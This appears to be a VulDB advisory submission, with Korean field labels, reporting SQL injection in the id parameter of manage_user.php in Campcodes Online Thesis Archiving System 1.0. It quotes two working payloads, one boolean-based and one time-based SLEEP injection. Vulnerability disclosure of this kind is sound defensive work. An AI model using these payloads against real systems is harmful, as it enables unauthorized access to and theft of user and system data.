| 제목 | SQL injection vulnerability exists in Online Thesis Archiving System |
|---|
| 설명 | SQL injection vulnerability exists in id parameter of /admin/user/manage_user.php file of Online Thesis Archiving System
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
When visit /admin/index.php and page parameter is ‘user/manage_user’,it will include /admin/user/manage_user.php,and id parameter can do sql injection.
Payload:
page=user/manage_user&id=1' AND 2089=(SELECT (CASE WHEN (2089=2089) THEN 2089 ELSE (SELECT 2677 UNION SELECT 6088) END))-- -
or
page=user/manage_user&id=1' AND (SELECT 8750 FROM (SELECT(SLEEP(5)))HyTk) AND 'JftA'='JftA |
|---|
| 원천 | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/Online%20Thesis%20Archiving%20System/Online%20Thesis%20Archiving%20System%20-%20vuln%207.pdf |
|---|
| 사용자 | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| 제출 | 2023. 04. 18. AM 08:34 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 04. 18. PM 12:47 (4 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 226270 [Campcodes Online Thesis Archiving System 1.0 manage_user.php 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|